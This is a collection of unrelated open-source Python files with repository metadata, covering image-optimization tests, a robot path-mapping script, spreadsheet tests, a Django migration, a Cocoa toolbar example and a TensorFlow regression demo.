["test/images/landscape.png", {"resize": [96, 32]}, (64, 32)],
["test/images/portrait.png", {"resize": [64, 64]}, (32, 64)],
["test/images/portrait.png", {"resize": [64, 96]}, (48, 96)],
["test/images/portrait.png", {"resize": [32, 96]}, (32, 64)],
# fmt: on
],
)
def test_option_resize(self, image_path, options, output_image_size):
output = io.BytesIO()
yoga.image.optimize(image_path, output, options)
output.seek(0)
image = Image.open(output)
assert image.width == output_image_size[0]
assert image.height == output_image_size[1]
def test_jpeg_quality(self):
output1 = io.BytesIO()
yoga.image.optimize(
"test/images/image1.jpg", output1, {"jpeg_quality": 1.00}
)
output1.seek(0)
output2 = io.BytesIO()
yoga.image.optimize(
"test/images/image1.jpg", output2, {"jpeg_quality": 0.50}
)
output2.seek(0)
assert len(output2.read()) < len(output1.read())
def test_webp_quality(self):
output1 = io.BytesIO()
yoga.image.optimize(
"test/images/alpha.lossy.webp", output1, {"webp_quality": 1.00}
)
output1.seek(0)
output2 = io.BytesIO()
yoga.image.optimize(
"test/images/alpha.lossy.webp", output2, {"webp_quality": 0.50}
)
output2.seek(0)
assert len(output2.read()) < len(output1.read())
@pytest.mark.parametrize(
"image_path,threshold,format_checker",
[
# fmt: off
("test/images/alpha.png", 254, is_png),
("test/images/alpha.png", 0, is_jpeg),
("test/images/threshold.png", 254, is_png),
("test/images/threshold.png", 255, is_png),
("test/images/threshold.png", 0, is_jpeg),
("test/images/threshold.png", 230, is_png),
("test/images/threshold.png", 229, is_jpeg),
# fmt: on
],
)
def test_opacity_threshold(self, image_path, threshold, format_checker):
output = io.BytesIO()
yoga.image.optimize(
image_path,
output,
{
"output_format": "auto",
"opacity_threshold": threshold,
},
)
output.seek(0)
assert format_checker(output.read())
# TODO test wrong image / fuzzy inputs
| [
"flo@flogisoft.com"
] | flo@flogisoft.com |
fee04a2ce585c18e0abdd8ac8045c4d1e98b73e8 | 5c8f8e34579f8b2609648b106daed5b313d54ff8 | /2020/In Development/26_1_2020/MappingTest/Test Functions/pathMapping.py | 3dba00bb77d5d8e74bd5ffbc854324ac8a2e2ea7 | [] | no_license | CaithyJo/Compete-with-CoSpace | 357f35dac71599238855d6b3e1bd2a0fdb311244 | cdf3c969a71fe2cf46ec001f0a77d16b968ef4db | refs/heads/master | 2023-03-16T06:06:50.758364 | 2021-01-03T17:13:25 | 2021-01-03T17:13:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,677 | py | from PIL import Image
import sys
sys.path.append('./Python_Libraries/')
from ImageCalculation import *
def standardInputLines():
lines = []
while True:
data = input()
if data == "": break
lines.append(data)
return lines
def cppInput(x1, y1, x2, y2):
#os.system("g++ astar.cpp -o astar.exe") #Compile on the spot
cmd = os.popen(f'cd AStar && echo {x1} {y1} {x2} {y2} | astar.exe').read()
#cmd = os.popen(f'echo {x1} {y1} {x2} {y2} | ./astar').read()
lines = cmd.split("\n")
return lines[:-1]
def inputToCoordinates(lines):
coordinates = []
for line in lines:
coordinates.append( [int(i) for i in line.split()] )
return coordinates
def addCoordinates(coordinates, pixels, colour):
try:
for x,y in coordinates:
pixels[x,-y-1] = colour
except:pass
def run(mapname="map.txt",pathname="path.txt"):
layout=[]
with open("C:/Users/zunmu/Microsoft Robotics Dev Studio 4/"+mapname) as m:
while True:
data = m.readline()
#print(data)
if data=="":break
data = [int(i) for i in data.split()]
layout = [data]+layout
print(f"Getting Path, {len(layout[1])},{len(layout)}")
lines = []
with open("C:/Users/zunmu/Microsoft Robotics Dev Studio 4/"+pathname) as p:
while True:
data = p.readline()
if data == "":break
lines.append(data)
coordinates = inputToCoordinates(lines)
newMap = switchYValues(mapData(im.size, pixels))
newImg, newPixels = convertBack(layout)
addCoordinates(coordinates, newPixels,(100,100,0))
newImg.show()
import os
from PreprocessedMap import data
if __name__ == '__main__':
print("Show the Path on the Image")
print("Make sure to compile astar.cpp into astar.exe first")
#imageFile = "ZonedGuessed.png"#input('Enter image file: ')
#im = Image.open(imageFile)
#im = resizeImage(im, 360)
#im.show()
#pixels = im.load()
im, pixels = convertBack(data)
print(im.size)
#lines = standardInputLines()
x1, y1, x2, y2 = 125, 95, 256, 211
try:
x1, y1, x2, y2 = [int(i) for i in input("Enter coordinates in the form x1 y1 x2 y2:").split(",")]
lines = cppInput(x1, y1, x2, y2)
print("Path Length:",len(lines))
coordinates = inputToCoordinates(lines)
newMap = switchYValues(mapData(im.size, pixels))
newImg, newPixels = convertBack(newMap)
addCoordinates(coordinates, newPixels,(100,100,0))
newImg.show()
except:
print("RUN")
run()
#x1, y1 = 30, 30
| [
"zunmun@gmail.com"
] | zunmun@gmail.com |
05cf9539b5593166a6ca2b77fd944d9d536ca31e | c97b9ae1bf06757ba61f90905e4d9b9dd6498700 | /venv/Lib/site-packages/markupsafe/_native.py | f4c3e63ba0250f65ba5bb193a47944e02054786b | [] | no_license | Rahulk1p/image-processor | f7ceee2e3f66d10b2889b937cdfd66a118df8b5d | 385f172f7444bdbf361901108552a54979318a2d | refs/heads/main | 2023-03-27T10:09:46.080935 | 2021-03-16T13:04:02 | 2021-03-16T13:04:02 | 348,115,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:2f0b1893e187a0fb0f6e8443fed342ebf8d39828f730bb6c9c3162b3b1e3139d
size 1942
| [
"rksc.k1p@gmail.com"
] | rksc.k1p@gmail.com |
d28849e73d7395237791fdcf7361553e6c5140ce | 3e30e334d759a3606be1dce6dca1154568808d68 | /xlsxwriter/test/comparison/test_autofilter01.py | 0fe9cd39837a51b1f53c5a6cdaa1f4caa5096c36 | [
"BSD-2-Clause-Views"
] | permissive | cimarronm/XlsxWriter | 59668816c4faf5b2e5fc7b96a4ab98d5797891b7 | b440055bebfcc08339bc3e43cc2ce9819a142004 | refs/heads/master | 2021-01-18T10:07:21.729676 | 2014-08-12T23:17:43 | 2014-08-12T23:17:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,652 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2014, John McNamara, jmcnamara@cpan.org
#
import unittest
import os
from ...workbook import Workbook
from ..helperfunctions import _compare_xlsx_files
class TestCompareXLSXFiles(unittest.TestCase):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'autofilter01.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.txt_filename = test_dir + 'xlsx_files/' + 'autofilter_data.txt'
self.ignore_files = []
self.ignore_elements = {}
def test_create_file(self):
"""
Test the creation of a simple XlsxWriter file with an autofilter.
This test corresponds to the following examples/autofilter.py example:
Example 1. Autofilter without conditions.
"""
filename = self.got_filename
####################################################
workbook = Workbook(filename)
worksheet = workbook.add_worksheet()
# Set the autofilter.
worksheet.autofilter('A1:D51')
# Open a text file with autofilter example data.
textfile = open(self.txt_filename)
# Start writing data from the first worksheet row.
row = 0
# Read the text file and write it to the worksheet.
for line in textfile:
# Split the input data based on whitespace.
data = line.strip("\n").split()
# Convert the number data from the text file.
for i, item in enumerate(data):
try:
data[i] = float(item)
except ValueError:
pass
# Write out the row data.
worksheet.write_row(row, 0, data)
# Move on to the next worksheet row.
row += 1
textfile.close()
workbook.close()
####################################################
got, exp = _compare_xlsx_files(self.got_filename,
self.exp_filename,
self.ignore_files,
self.ignore_elements)
self.assertEqual(got, exp)
def tearDown(self):
# Cleanup.
if os.path.exists(self.got_filename):
os.remove(self.got_filename)
if __name__ == '__main__':
unittest.main()
| [
"jmcnamara@cpan.org"
] | jmcnamara@cpan.org |
96bd3159f7830d3224ff7077eabb35e57a3d226a | 7f2efccdd6413eb658161c91d75da7c0fe941505 | /catnap/parsers.py | 09befce809b08387315463842f709cef12545631 | [
"BSD-2-Clause"
] | permissive | aehlke/django-catnap | 82b093b9ee07f9edd294dac3e9ff3784fb2ac5cb | 4272cff0de639a65f5cc0fe131370e1531fc2e11 | refs/heads/master | 2016-09-10T15:49:43.799102 | 2016-01-26T03:02:44 | 2016-01-26T03:02:44 | 1,428,424 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 901 | py | # Adapted from https://github.com/tomchristie/django-rest-framework/blob/3d999e4be38f0836063aacdf31d1396fbbb3a5fc/rest_framework/parsers.py
import json
from webob.acceptparse import MIMEAccept
from catnap.exceptions import ParseError
class BaseParser(object):
mime_accept = None
@classmethod
def accepts(self, media_type):
media_type = media_type.split(';')[0].strip()
if not getattr(self, '_mime_accept', None):
self._mime_accept = MIMEAccept('Accept', self.mime_accept)
return media_type in self._mime_accept
def parse(self, request):
raise NotImplementedError("Must override the parse method.")
class JsonParser(BaseParser):
mime_accept = 'application/json'
def parse(self, request):
try:
return json.loads(request.body, request.encoding)
except ValueError:
raise ParseError()
| [
"alex.ehlke@gmail.com"
] | alex.ehlke@gmail.com |
88dff878e8a4dabbbde036ca86b56a9e9352c65a | fc79fcfac8a51f35dde0d931cc5b58e9a60498f4 | /sbds/storages/db/tables/operations/virtual/comment_payout_update.py | 167916c8cfb5eb0621aa59c6b0be938019ea5a7f | [
"LicenseRef-scancode-warranty-disclaimer",
"BSD-2-Clause"
] | permissive | Jblew/sbds | 9306ea0fc403a4841be4f3291df309f5f3944f21 | ec1c9cb48d61f78e8a22158b948a50872f44cf51 | refs/heads/master | 2020-03-07T14:55:58.419898 | 2018-03-31T15:55:21 | 2018-03-31T15:55:21 | 127,540,058 | 0 | 0 | null | 2018-03-31T14:37:25 | 2018-03-31T14:37:25 | null | UTF-8 | Python | false | false | 2,649 | py | # -*- coding: utf-8 -*-
import dateutil.parser
from sqlalchemy import DateTime
from sqlalchemy import String
from sqlalchemy import Column
from sqlalchemy import Numeric
from sqlalchemy import Unicode
from sqlalchemy import UnicodeText
from sqlalchemy import Boolean
from sqlalchemy import SmallInteger
from sqlalchemy import Integer
from sqlalchemy import BigInteger
from sqlalchemy import ForeignKeyConstraint
from sqlalchemy import PrimaryKeyConstraint
from sqlalchemy import Index
from sqlalchemy.dialects.postgresql import JSONB
from toolz.dicttoolz import dissoc
import sbds.sbds_json
from ...import Base
from ....enums import operation_types_enum
from ....field_handlers import json_string_field
from ....field_handlers import amount_field
from ....field_handlers import amount_symbol_field
from ....field_handlers import comment_body_field
class CommentPayoutUpdateVirtualOperation(Base):
"""
Steem Blockchain Example
======================
"""
__tablename__ = 'sbds_op_virtual_comment_payout_updates'
__table_args__ = (
ForeignKeyConstraint(['author'], ['sbds_meta_accounts.name'],
deferrable=True, initially='DEFERRED', use_alter=True),)
id = Column(Integer, primary_key=True)
block_num = Column(Integer, nullable=False, index=True)
transaction_num = Column(SmallInteger, nullable=False, index=True)
operation_num = Column(SmallInteger, nullable=False, index=True)
trx_id = Column(String(40),nullable=False)
timestamp = Column(DateTime(timezone=False))
author = Column(String(16)) # steem_type:account_name_type
permlink = Column(Unicode(256), index=True) # name:permlink
operation_type = Column(operation_types_enum,nullable=False,index=True,default='comment_payout_update')
_fields = dict(
)
_account_fields = frozenset(['author',])
def dump(self):
return dissoc(self.__dict__, '_sa_instance_state')
def to_dict(self, decode_json=True):
data_dict = self.dump()
if isinstance(data_dict.get('json_metadata'), str) and decode_json:
data_dict['json_metadata'] = sbds.sbds_json.loads(
data_dict['json_metadata'])
return data_dict
def to_json(self):
data_dict = self.to_dict()
return sbds.sbds_json.dumps(data_dict)
def __repr__(self):
return "<%s (block_num:%s transaction_num: %s operation_num: %s keys: %s)>" % (
self.__class__.__name__, self.block_num, self.transaction_num,
self.operation_num, tuple(self.dump().keys()))
def __str__(self):
return str(self.dump())
| [
"john.gerlock@gmail.com"
] | john.gerlock@gmail.com |
d7f21dc308cc0c1bf12ac7c40b297d3fd7c49832 | cf293781d511de38130049fe92a75c85d5d20da4 | /apps/phonebook/migrations/0004_inviterFK.py | c26962c5f53712e78a89094997b05696efd15ee5 | [] | no_license | jdm/mozillians | e989e044bfc690bbe8d13308ced349125f39c821 | b7a6deb05e33be9b1d025a56a5ddf8a59a9f39ae | refs/heads/master | 2021-01-15T20:28:14.356913 | 2012-01-19T22:36:08 | 2012-01-19T22:36:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,700 | py | # encoding: utf-8
import datetime
from django.db import models
from django.db.utils import IntegrityError
import commonware.log
from south.db import db
from south.v2 import DataMigration
from users.models import UserProfile
log = commonware.log.getLogger('m.migrator')
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
for i in orm.Invite.objects.all():
try:
i.inviter_id = UserProfile.objects.get_by_unique_id(
i.inviter_old).id
if i.redeemer_old:
i.redeemer_id = UserProfile.objects.get_by_unique_id(
i.redeemer_old).id
i.save()
log.debug('Invite %d converted' % i.pk)
except UserProfile.DoesNotExist:
log.warning('Invite %d not converted' % i.pk)
except IntegrityError as e:
if 'redeemer_id' in e.args[1]:
log.warning('Bogus looking invite, deleting %d' % i.pk)
i.delete()
else:
raise
def backwards(self, orm):
"Write your backwards methods here."
# No going back from LDAP
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'groups.group': {
'Meta': {'object_name': 'Group', 'db_table': "'group'"},
'always_auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_complete': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'system': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'url': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'phonebook.invite': {
'Meta': {'object_name': 'Invite', 'db_table': "'invite'"},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inviter': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'invites'", 'null': 'True', 'to': "orm['users.UserProfile']"}),
'inviter_old': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'db_column': "'inviter'"}),
'recipient': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'redeemed': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'redeemer': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['users.UserProfile']", 'unique': 'True', 'null': 'True'}),
'redeemer_old': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'db_column': "'redeemer'"})
},
'users.userprofile': {
'Meta': {'object_name': 'UserProfile', 'db_table': "'profile'"},
'bio': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'confirmation_code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['groups.Group']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ircname': ('django.db.models.fields.CharField', [], {'max_length': '63', 'blank': 'True'}),
'is_confirmed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_vouched': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'photo': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}),
'vouched_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['users.UserProfile']", 'null': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['phonebook']
| [
"dd+github@davedash.com"
] | dd+github@davedash.com |
911b89bac770bb745ece42e19bcc10845fea6125 | 6d69b249a81e076d79787dd08eb8957908052052 | /projects/inflection/scripts/bin/dev/version.py | 8543f8ddd73421c12337a62f94f1e268282affb5 | [] | no_license | 2vitalik/wiktionary | 02ee1f1327c3b82fc7b4d7da12083b1431b1eb8b | 8edae2f7dcf9089084c5ce7033c4fb0b454f4dfa | refs/heads/master | 2023-02-06T11:28:41.554604 | 2023-02-05T22:49:01 | 2023-02-05T22:49:01 | 121,025,447 | 7 | 2 | null | 2021-10-13T17:36:32 | 2018-02-10T15:06:24 | Lua | UTF-8 | Python | false | false | 425 | py |
version = '4.5.13'
desc = 'Попытка исправить "старшой" (надеюсь, ничего не сломается другое)'
# todo: почистить старые неиспользуемые модули на ВС (старые имена)
# todo: разные файлы запуска для dev-версии и для prod-версии
# todo: append history changes entry to some page on wikt
| [
"vitaliy.lyapota@anvileight.com"
] | vitaliy.lyapota@anvileight.com |
10150760c6a4c2e0101c502f8885772070e14c6c | 933e89e2d45803ff021cc684b4b78cd2e14a5b15 | /AllBehaviours/GreedyExplore.py | ca7ef5c1053e2d1a2d5139501868e15443fe2aac | [] | no_license | Occy88/MultiAgents | 8123d2718df5f3ad202410097f821c6d69eadd7b | c49d89caf2db49dcc3571d87fa4fb4bade516226 | refs/heads/master | 2022-12-14T18:36:02.343056 | 2021-01-01T13:38:10 | 2021-01-01T13:38:10 | 214,148,130 | 0 | 0 | null | 2022-11-22T04:36:34 | 2019-10-10T10:00:00 | Python | UTF-8 | Python | false | false | 2,309 | py | import vacuumworld
from vacuumworld.vwc import action, direction
import math
from agent_util import AgentPercepts
from agent_util import get_closest_agent
from agent_util import GridDirections
from agent_util import get_cam_detections
from agent_util import CommunicationKeys
from agent_util import GridState
import random
import json
# import numpy as np
class GreedyExplore:
"""
Agent has a state of the map with
values in each cell representing how many
cycles ago they were explored.
Greedy explore directs the agent towards the most expensive node
if another agent is nearer to the node (via the tie break function)
n e.g. 10 points are taken away from the node
"""
def __init__(self):
# required params
self.message = {}
self.messages = []
# it's fine to redeclare just to get the functions while programming.
self.grid_state = GridState()
self.orientation = 'none'
self.position = (-1, -1)
# penalty if other agent is closer:
self.penalty = 20
# penalty for points on an edge
def run(self):
print("==================GREEDILY EXPLORING===============")
adjusted = self.get_adjusted()
self.choose_max(adjusted)
def get_adjusted(self):
price_matrix = []
i = 0
agents = []
for y, li in enumerate(self.grid_state.locations):
price_matrix.append([])
for x, p in enumerate(li):
price_matrix[y].append(p.age)
if p.agent is not None:
agents.append((p.agent, (x, y)))
for y, li in enumerate(price_matrix):
for x, p in enumerate(li):
closest_agent=get_closest_agent(agents,(x,y))
# print(self.name,closest_agent[0])
if self.name==closest_agent[0][0]:
price_matrix[y][x] -= self.penalty
# price_matrix=np.array(price_matrix)
# print(price_matrix)
return price_matrix
def choose_max(self, price_matrix):
max = 0
# choose a max
for y, l in enumerate(price_matrix):
for x, p in enumerate(l):
if p > max:
max = p
self.target_position = (x, y)
| [
"octavio.delser@gmail.com"
] | octavio.delser@gmail.com |
ee5cef4c42b866c99b6379512fec4733153ba628 | 34d5ebe9e6de9d6742c234dabfa9b38f0adb7774 | /carriage_return/dm.py | 646e2bf2b6a0ecb6d28c26fc2dcef2ed447891c6 | [] | no_license | campagnola/return-to-carriage | f37acaf8e41ccf04e7089018574732a1fdcd2a64 | eeb7f31b16e2c236c875c867a0295173fa6f4b0a | refs/heads/master | 2021-08-05T14:02:49.988526 | 2021-07-31T08:38:17 | 2021-07-31T08:38:17 | 84,014,684 | 0 | 2 | null | 2021-07-30T02:48:13 | 2017-03-06T00:55:55 | Python | UTF-8 | Python | false | false | 1,090 | py |
class DungeonMaster:
"""Responsible for managing turns, accepting requests to change the world state, and
deciding what actual changes to make.
"""
def __init__(self, scene):
self.scene = scene
def request_player_move(self, player, newpos):
"""Attempt to move the player to newpos.
"""
pos = player.location.slot
j, i = newpos
j0, i0 = player.location.slot
if self.scene.maze.blocktype_at(i, j)['walkable']:
self.move_player(player, newpos)
elif self.scene.maze.blocktype_at(i0, j)['walkable']:
newpos[1] = i0
self.move_player(player, newpos)
elif self.scene.maze.blocktype_at(i, j0)['walkable']:
newpos[0] = j0
self.move_player(player, newpos)
self.norm_light = None
def move_player(self, player, pos):
player.location.update(self.scene.maze, pos)
self.end_turn()
def end_turn(self):
for mlist in list(self.scene.monsters.values()):
for m in mlist:
m.take_turn()
| [
"luke.campagnola@gmail.com"
] | luke.campagnola@gmail.com |
351320168f45d58e0903ed4baddef25e5b8579a3 | 1577e1cf4e89584a125cffb855ca50a9654c6d55 | /pyobjc/pyobjc/pyobjc-framework-Cocoa-2.5.1/Examples/AppKit/CocoaBindings/TableModelWithSearch/ToolbarCreator.py | e19e19ca5fce6827a2c200a9aca211088ffb0281 | [
"MIT"
] | permissive | apple-open-source/macos | a4188b5c2ef113d90281d03cd1b14e5ee52ebffb | 2d2b15f13487673de33297e49f00ef94af743a9a | refs/heads/master | 2023-08-01T11:03:26.870408 | 2023-03-27T00:00:00 | 2023-03-27T00:00:00 | 180,595,052 | 124 | 24 | null | 2022-12-27T14:54:09 | 2019-04-10T14:06:23 | null | UTF-8 | Python | false | false | 3,785 | py | #
# ToolbarCreator.py
# TableModelWithSearch
#
# Created by Bill Bumgarner on Sun Apr 04 2004.
# Copyright (c) 2004 __MyCompanyName__. All rights reserved.
#
from Cocoa import *
kToolbarIdentifier = "TableModel Toolbar Identifier"
kSearchFieldItemIdentifier = "TableModel Search Field Identifier"
from FilteringArrayController import kLiteralSearch, kRegularExpressionSearch
class ToolbarCreator (NSObject):
filteringArrayController = objc.IBOutlet()
searchField = objc.IBOutlet()
window = objc.IBOutlet()
def awakeFromNib(self):
self.toolbarItemCache = {}
# create toolbar containing search field
toolbar = NSToolbar.alloc().initWithIdentifier_(kToolbarIdentifier)
toolbar.setDelegate_(self)
toolbar.setAllowsUserCustomization_(True)
toolbar.setAutosavesConfiguration_(True)
searchFieldItem = NSToolbarItem.alloc().initWithItemIdentifier_(kSearchFieldItemIdentifier)
self.searchFieldItem = searchFieldItem
searchFieldItem.setLabel_("Search")
searchFieldItem.setPaletteLabel_("Search Field")
searchFieldItem.setToolTip_("Search")
searchFieldItem.setView_(self.searchField)
searchFieldItem.setMinSize_(self.searchField.bounds().size)
maxSize = self.searchField.bounds().size
maxSize.width = maxSize.width + 150
searchFieldItem.setMaxSize_(maxSize)
self.toolbarItemCache[kSearchFieldItemIdentifier] = searchFieldItem
self.window.setToolbar_(toolbar)
cellMenu = NSMenu.alloc().initWithTitle_(u'Search Menu')
# note, bottom up!
for v in [kRegularExpressionSearch, kLiteralSearch]:
item = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(v, 'changeSearchType:', u'')
item.setRepresentedObject_(v)
item.setTarget_(self)
cellMenu.insertItem_atIndex_(item, 0)
self.searchField.cell().setSearchMenuTemplate_(cellMenu)
# this better be the kLiteralSearch menu item
self.changeSearchType_(item)
@objc.IBAction
def changeSearchType_(self, sender):
obj = sender.representedObject()
self.searchField.cell().setPlaceholderString_(obj)
self.searchField.setStringValue_(u'')
self.filteringArrayController.changeSearchType_(obj)
def toolbarDefaultItemIdentifiers_(self, aToolbar):
return [
kSearchFieldItemIdentifier,
NSToolbarFlexibleSpaceItemIdentifier,
NSToolbarSeparatorItemIdentifier,
NSToolbarCustomizeToolbarItemIdentifier,
]
def toolbarAllowedItemIdentifiers_(self, aToolbar):
return [
kSearchFieldItemIdentifier,
NSToolbarFlexibleSpaceItemIdentifier,
NSToolbarSpaceItemIdentifier,
NSToolbarSeparatorItemIdentifier,
NSToolbarPrintItemIdentifier,
NSToolbarCustomizeToolbarItemIdentifier,
]
def toolbar_itemForItemIdentifier_willBeInsertedIntoToolbar_(self, toolbar, itemIdentifier, flag):
newItem = NSToolbarItem.alloc().initWithItemIdentifier_(itemIdentifier)
item = self.toolbarItemCache[itemIdentifier]
newItem.setLabel_( item.label() )
newItem.setPaletteLabel_( item.paletteLabel() )
if item.view():
newItem.setView_( item.view() )
else:
newItem.setImage_( item.image() )
newItem.setToolTip_( item.toolTip() )
newItem.setTarget_( item.target() )
newItem.setAction_( item.action() )
newItem.setMenuFormRepresentation_( item.menuFormRepresentation() )
if newItem.view():
newItem.setMinSize_( item.minSize() )
newItem.setMaxSize_( item.maxSize() )
return newItem
| [
"opensource@apple.com"
] | opensource@apple.com |
1ab4d96b3175a9f1c1ed07bdcdf9de41fe98944e | 632099ac0d895943cbbeb9048a2cdfcd21102411 | /Axiom_AIR_25_49_61/__init__.py | 456888a88e3b9d6b5be158e5d1745b620420cede | [] | no_license | Toniigor/AbletonLive9_RemoteScripts | 7f4bbf759a79629584413f6d1797005e8cd7f2ff | fed1e5ee61ea12ea6360107a65a6e666364353ff | refs/heads/master | 2021-01-16T21:19:25.330221 | 2014-06-06T12:33:03 | 2014-06-06T12:33:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py | #Embedded file name: /Users/versonator/Jenkins/live/Projects/AppLive/Resources/MIDI Remote Scripts/Axiom_AIR_25_49_61/__init__.py
from Axiom_AIR_25_49_61 import Axiom_AIR_25_49_61
from _Framework.Capabilities import controller_id, inport, outport, CONTROLLER_ID_KEY, PORTS_KEY, NOTES_CC, SCRIPT
def get_capabilities():
return {CONTROLLER_ID_KEY: controller_id(vendor_id=1891, product_ids=[8243], model_name='Axiom AIR 49'),
PORTS_KEY: [inport(props=[NOTES_CC]),
inport(props=[SCRIPT]),
inport(props=[NOTES_CC]),
outport(props=[NOTES_CC]),
outport(props=[SCRIPT])]}
def create_instance(c_instance):
return Axiom_AIR_25_49_61(c_instance) | [
"julien@julienbayle.net"
] | julien@julienbayle.net |
4fa18cacdc15dddf259b9dda69a1697ed7fa9be0 | 5ab1130ae04735463fc44102adbe7d7072d9b8c9 | /pylearn/tensorflow/linear_regression_tf_contrib_learn.py | 9a9d2931d3ecbb9f377a94cafa2a573d69e8ac7f | [] | no_license | sigirisetti/python_projects | 8f917a6d052d7cb717f48fde8b791e4638ea821d | 123386b2f91be870e4795df14109142d7cd2eb96 | refs/heads/master | 2023-08-23T04:34:36.464290 | 2023-08-13T11:15:33 | 2023-08-13T11:15:33 | 130,079,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,441 | py | import tensorflow as tf
# NumPy is often used to load, manipulate and preprocess data.
import numpy as np
# Declare list of features. We only have one real-valued feature. There are many
# other types of columns that are more complicated and useful.
features = [tf.contrib.layers.real_valued_column("x", dimension=1)]
# An estimator is the front end to invoke training (fitting) and evaluation
# (inference). There are many predefined types like linear regression,
# logistic regression, linear classification, logistic classification, and
# many neural network classifiers and regressors. The following code
# provides an estimator that does linear regression.
estimator = tf.contrib.learn.LinearRegressor(feature_columns=features)
# TensorFlow provides many helper methods to read and set up data sets.
# Here we use `numpy_input_fn`. We have to tell the function how many batches
# of data (num_epochs) we want and how big each batch should be.
x = np.array([1., 2., 3., 4.])
y = np.array([0., -1., -2., -3.])
input_fn = tf.contrib.learn.io.numpy_input_fn({"x":x}, y, batch_size=4, num_epochs=1000)
# We can invoke 1000 training steps by invoking the `fit` method and passing the
# training data set.
estimator.fit(input_fn=input_fn, steps=1000)
# Here we evaluate how well our model did. In a real example, we would want
# to use a separate validation and testing data set to avoid overfitting.
estimator.evaluate(input_fn=input_fn) | [
"sigirisetti@yahoo.com"
] | sigirisetti@yahoo.com |
